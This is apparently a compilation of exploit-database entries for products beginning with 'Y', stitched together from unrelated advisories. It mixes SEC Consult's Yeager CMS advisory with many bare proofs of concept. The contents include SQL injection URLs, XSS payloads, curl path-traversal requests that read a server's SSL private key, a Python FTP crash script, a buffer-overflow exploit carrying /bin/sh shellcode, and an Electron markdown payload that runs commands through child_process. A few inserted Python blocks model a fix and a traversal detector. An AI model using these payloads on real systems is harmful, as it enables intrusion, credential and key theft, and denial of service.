
SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Yeager CMS
 vulnerable version: 1.2.1
      fixed version: 1.3
         CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570,
                     CVE-2015-7571, CVE-2015-7572
             impact: Critical
           homepage: http://yeager.cm/en/home/
              found: 2015-11-18
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.


Business recommendation:
------------------------
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
    1. Change users' passwords, including the administrator's account.
    2. Gain full access to the Yeager CMS database.
    3. Determine internal servers that are inaccessible from the Internet.
    4. Attack other users of the Yeager CMS with Cross-Site Scripting.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)


Proof of concept:
-----------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http://<host>/yeager/?action=passwordreset&token=<SQL Injection>
http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"<SQL Injection>"}}]

The vulnerability can also be used to reset the password of any user without
authorization. To reset a specific user's password, the attacker needs a valid
email address of the targeted user. The email address can be obtained either by
social engineering or by using the aforementioned unauthenticated SQL injection
vulnerability.

http://<host>/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&lh=70&data=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@email.com>","winID":"1"}}]

The above URL simply creates a password-reset token and sends it to the user's
email address. Even without knowing that token, the attacker can manipulate the
SQL query in the next request so that the new password is set immediately.

Note that the new password MUST be at least 8 characters long and must contain
both letters and numbers.

http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+uid=(select+id+from+yg_user+where+login='<victim@email.com>')+limit+1--+-","userPassword":"<new-password>","winID":"1"}}]
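To show why the userToken payload above works and what the fix looks like, here is an added Python/sqlite3 model of the recoverLogin and setNewPassword flow (example code, not Yeager's; the schema, table names, accounts and the hash placeholder are constructed for the demo): the vulnerable handler splices the token into the SQL text, the fixed handler binds it as a parameter, enforces the password policy quoted above and makes the token single-use.

```python
import hashlib
import re
import secrets
import sqlite3

# Constructed schema for the demonstration (not Yeager's real schema):
# users plus the one-time reset tokens minted by the recoverLogin step.
SCHEMA = """
CREATE TABLE yg_user (id INTEGER PRIMARY KEY, login TEXT UNIQUE, password TEXT);
CREATE TABLE yg_user_token (uid INTEGER NOT NULL, token TEXT NOT NULL);
"""

# Same shape as the advisory's userToken payload: the attacker knows the
# victim's login but not the token that recoverLogin mailed to the victim.
ADVISORY_PAYLOAD = (
    "' or uid=(select id from yg_user where login='admin@example.com') limit 1-- -"
)


def hash_pw(password):
    # Placeholder for a real password KDF (argon2/bcrypt); keeps the demo deterministic.
    return hashlib.sha256(password.encode()).hexdigest()


def password_ok(password):
    # Policy quoted in the advisory: at least 8 characters, letters and digits.
    return (len(password) >= 8
            and re.search(r"[A-Za-z]", password) is not None
            and re.search(r"[0-9]", password) is not None)


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute("INSERT INTO yg_user VALUES (1, 'admin@example.com', ?)", (hash_pw("Admin-old-1"),))
    db.execute("INSERT INTO yg_user VALUES (2, 'alice@example.com', ?)", (hash_pw("Alice-old-1"),))
    return db


def recover_login(db, email):
    """Models recoverLogin: mint a random token for the user (it would be e-mailed)."""
    row = db.execute("SELECT id FROM yg_user WHERE login = ?", (email,)).fetchone()
    if row is None:
        return None
    token = secrets.token_urlsafe(32)
    db.execute("INSERT INTO yg_user_token VALUES (?, ?)", (row[0], token))
    return token


def set_new_password_vulnerable(db, user_token, new_password):
    """Token spliced into the SQL text, so it is parsed as SQL rather than as data."""
    sql = "SELECT uid FROM yg_user_token WHERE token = '%s'" % user_token
    row = db.execute(sql).fetchone()
    if row is None:
        return False
    db.execute("UPDATE yg_user SET password = ? WHERE id = ?", (hash_pw(new_password), row[0]))
    return True


def set_new_password_fixed(db, user_token, new_password):
    """Bound parameter: the token can only match literally; it is also single-use."""
    if not password_ok(new_password):
        return False
    row = db.execute("SELECT uid FROM yg_user_token WHERE token = ?", (user_token,)).fetchone()
    if row is None:
        return False
    db.execute("UPDATE yg_user SET password = ? WHERE id = ?", (hash_pw(new_password), row[0]))
    db.execute("DELETE FROM yg_user_token WHERE uid = ?", (row[0],))
    return True


def password_hash_of(db, email):
    return db.execute("SELECT password FROM yg_user WHERE login = ?", (email,)).fetchone()[0]


if __name__ == "__main__":
    db = new_db()
    recover_login(db, "admin@example.com")          # step 1 of the advisory's flow
    print("vulnerable:", set_new_password_vulnerable(db, ADVISORY_PAYLOAD, "Pwned1234"))
    db = new_db()
    recover_login(db, "admin@example.com")
    print("fixed:", set_new_password_fixed(db, ADVISORY_PAYLOAD, "Pwned1234"))
```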

2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http://<host>/yeager/y.php/tab_USERLIST
POST Data:
win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=<SQL Injection>&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1

3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, successful exploitation requires the PHP directive
"upload_tmp_dir" to be set to an existing directory that contains a writable
subdirectory named "plupload".

By default, the PHP directive "upload_tmp_dir" is empty. As a result, the
script attempts to write the uploaded file to /plupload/ instead, a directory
that generally does not exist on the filesystem.

http://<host>/yeager/ui/js/3rd/plupload/examples/upload.php

4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php

The "dbhost" parameter can be used to perform an internal port scan based on
response-time measurement. An attacker supplies an internal IP address and
port number, for example 10.10.0.1:22, and then compares the response delays
of multiple requests to determine whether the host and port are reachable.

5. Non-permanent Cross-site Scripting (CVE-2015-7572)
A previously published XSS vulnerability of Plupload was found in Yeager CMS.
http://<host>/yeager/ui/js/3rd/plupload/js/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%28/XSS/%29;}//


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been tested on Yeager CMS 1.2.1

URL: http://yeager.cm/en/download/package/?v=1.2.1.0.0


Vendor contact timeline:
------------------------
2015-12-07: Contacting vendor through office@nexttuesday.de, contact@yeager.cm
2015-12-07: Established secure communication channel
2015-12-07: Sending advisory draft
2015-12-10: Yeager CMS 1.2.2 released for security fixes
2015-12-22: Yeager CMS 1.3 released for security fixes
2016-02-10: Public advisory release

Solution:
---------
The vulnerabilities have been fixed in Yeager CMS 1.3 and later.

https://github.com/ygcm/yeager/commit/74e0ce518321e659cda54f3f565ca0ce8794dba8#diff-4200a6e704ae66ada32f35f69796cc71
https://github.com/ygcm/yeager/commit/053a3b98a9a3f4fd94186cbb8994de0a3e8d9307

Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2015
            
source: https://www.securityfocus.com/bid/55653/info

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
            
source: https://www.securityfocus.com/bid/47158/info

Yaws-Wiki is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Yaws-Wiki 1.88-1 is vulnerable; other versions may also be affected. 

Reflective XSS:
http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
 
Stored XSS:
http://www.example.com/editPage.yaws?node=home
 
            
source: https://www.securityfocus.com/bid/51276/info

Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Yaws 1.88 is vulnerable; other versions may be affected. 

http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/editPage.yaws?node=home 
            
[+] Credits: John Page aka hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec            
 


Vendor:
==========
yaws.hyber.org



Product:
===========
Yaws v1.91 (Yet Another Web Server)

Yaws is a high-performance HTTP 1.1 web server particularly well suited for dynamic-content web applications.
Two separate modes of operation are supported:

Standalone mode, where Yaws runs as a regular web server daemon. This is the default mode.
Embedded mode, where Yaws runs as an embedded web server in another Erlang application.



Vulnerability Type:
===================
Unauthenticated Remote File Disclosure



CVE Reference:
==============
CVE-2017-10974



Security Issue:
================
Remote attackers who can reach the Yaws web server can read the server's SSL private key file using directory
traversal; the access logs are disclosed as well, among other files. This version is somewhat old but is still
available for download as of the time of this writing: http://yaws.hyber.org/download/



Exploit/POC:
=============
Read the Yaws server's SSL private key (".pem") file.

curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem


-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----



--- OR Read the access logs. ---


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access  

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>
<H1>Not Found</H1>The requested URL /../logs/localhost.8080.access was not found on this server.<P><HR>
<address> Yaws 1.91 Server at localhost:8080 </address>  </BODY></HTML>

Then,


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access

127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

etc...
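As an added example (not part of the advisory), here is a Python path canonicaliser that handles a request path the way a hardened static-file handler should, decoding %5C to a backslash and treating it as a separator before collapsing ".." segments, plus a scan over constructed access-log lines in the format shown above that flags requests whose path would escape the document root. The log lines, client address and document root are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log sample in the format shown in the advisory; the last
# two entries are what the curl requests above would leave behind.
SAMPLE_LOG = """\
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0"
127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0"
198.51.100.7 - - [26/Jun/2017:10:01:02 -0400] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 200 1704 "-" "curl/7.52.1"
198.51.100.7 - - [26/Jun/2017:10:01:05 -0400] "GET /%5C../logs/localhost.8080.access HTTP/1.1" 200 2201 "-" "curl/7.52.1"
"""

# Groups: client, timestamp, method, path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def canonical_path(raw_path):
    """Return the request path relative to the document root, or None if it escapes.

    Decodes percent-escapes first (so %5C becomes a backslash), treats a
    backslash as a separator just like '/', then collapses '.' and '..'
    segments while the path is still relative: normalising '/../x' as an
    absolute path would silently swallow the '..' and hide the escape.
    """
    path = unquote(raw_path).replace("\\", "/")
    if "\x00" in path:
        return None
    norm = posixpath.normpath(path.lstrip("/"))
    if norm == ".":
        return ""                       # request for the root itself
    if norm.split("/", 1)[0] == "..":
        return None                     # would climb above the document root
    return norm


def resolve_under_docroot(docroot, raw_path):
    """Filesystem path to serve for raw_path, or None when the request must be refused."""
    rel = canonical_path(raw_path)
    if rel is None:
        return None
    return posixpath.join(docroot, rel)


def traversal_requests(log_text):
    """(client, raw_path, status) for every log entry whose path escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, raw_path, status = m.groups()
        if canonical_path(raw_path) is None:
            hits.append((client, raw_path, int(status)))
    return hits


if __name__ == "__main__":
    for client, path, status in traversal_requests(SAMPLE_LOG):
        print("traversal from %s: %s (status %d)" % (client, path, status))
```

A status of 200 on a flagged line means the server actually served the file, which is the case the advisory demonstrates; a 404 on the same path still records the probe.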



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=================================
Vendor Notification: June 26, 2017
No replies
July 7, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------

This exploit connects to the FTP service and sends a command of 256 bytes with a trailing space at the end.
The result is that the service crashes.

 -----------------------------[Exploit]---------------------------------------------

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket
import sys

if len(sys.argv) != 3:
    print("usage: %s targetip port" % sys.argv[0])
    sys.exit(1)

target = (sys.argv[1], int(sys.argv[2]))
# Oversized command followed by a trailing space (0x20), which triggers the crash
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))   # FTP banner
s.send(buffer)
s.close()

 -----------------------------[how to run]-----------------------------

C:\> TinyWinFTP.exe servepath port

~$ python3 exploit.py targetip port

Boom!
            
'''
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: General-purpose console screen reader
# Version: 0.6.9-5
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Yasr is a general-purpose console screen reader for GNU/Linux and other Unix-like operating systems.
# Kali Linux 2.0 package: pool/main/y/yasr/yasr_0.6.9-5_i386.deb
# MD5sum: 910f4b41fd09d5486b935097dc8dd2f8
# Website: http://yasr.sourceforge.net/
#
#
# Starting program: /usr/bin/yasr -p $(python -c 'print "\x90"*258')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
# Program received signal SIGSEGV, Segmentation fault.
#
# 0x90909090 in ?? ()
#
#gdb$ backtrace
#0  0xb7fdebe0 in __kernel_vsyscall ()
#1  0xb7e33367 in __GI_raise (sig=sig@entry=0x6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2  0xb7e34a23 in __GI_abort () at abort.c:89
#3  0xb7e71778 in __libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0xb7f67715 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#4  0xb7f01b85 in __GI___fortify_fail (msg=msg@entry=0xb7f67696 "buffer overflow detected") at fortify_fail.c:31
#5  0xb7effc3a in __GI___chk_fail () at chk_fail.c:28
'''

import errno
import subprocess
import sys


def run():
    try:
        print("# Yasr Console Screen Reader - Buffer Overflow by Juan Sacco")
        print("# This exploit is for educational purposes only")
        # JUNK + SHELLCODE + NOPS + EIP, built as bytes so the raw values
        # reach the target's argv unchanged
        junk = b"\x41" * 298
        shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        nops = b"\x90" * 12
        eip = b"\xd2\xf3\xff\xbf"
        # Each argv element is its own list item; the original had trailing
        # spaces in "yasr " and "-p ", which made the binary lookup fail
        subprocess.call([b"yasr", b"-p", junk + shellcode + nops + eip])

    except OSError as e:
        if e.errno == errno.ENOENT:
            print("Sorry, Yasr Console Reader - Not found!")
        else:
            print("Error executing exploit")
        raise


if __name__ == '__main__':
    print("Exploit Yasr 0.6.9-5 Local Overflow Exploit")
    print("Author: Juan Sacco")
    run()
            
source: https://www.securityfocus.com/bid/61356/info

YardRadius is prone to multiple local format-string vulnerabilities.

Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.

YardRadius 1.1.2-4 is vulnerable; other versions may also be affected.

The following proof-of-concept is available:

ln -s radiusd %x

./%x -v 
            
source: https://www.securityfocus.com/bid/47698/info

YaPIG is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

YaPIG 0.95 is vulnerable; other versions may also be affected. 

http://www.example.com/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
            
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date: 2023-04-27

Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:

A vulnerability was discovered in Yank Note v3.52.1 that allows a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload.
Mac:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.
            
source: https://www.securityfocus.com/bid/53622/info

Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 

http://www.example.com/search/?text=%27);alert(document.cookie)// 
            
source: https://www.securityfocus.com/bid/53709/info

Yamamah Photo Gallery is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to download the database that contain sensitive information. Information harvested may aid in launching further attacks.

Yamamah 1.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/yamamah/cp/export.php 
            
source: https://www.securityfocus.com/bid/51011/info

The Yahoo! CD Player ActiveX control ('YoPlyCd.dll') is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.

Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. 

<object classid='clsid:5622772D-6C27-11D3-95E5-006008D14F3B' id='test'></object>

<script language='vbscript'>

 buff = String(2097512, "A") '<- EAX changes according to the first parameter of
                             '   "String" function (Number As Long)
 test.open buff

</script>
            
# Exploit Title: Yahoo User Interface library (YUI2) TreeView  v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197


The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

Twitter: @Ryan_412_
            
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.


#2. Proof of Concept
-----------------------------------------------------
Request:

POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1

pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=

-----------------------------------------------------
Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results
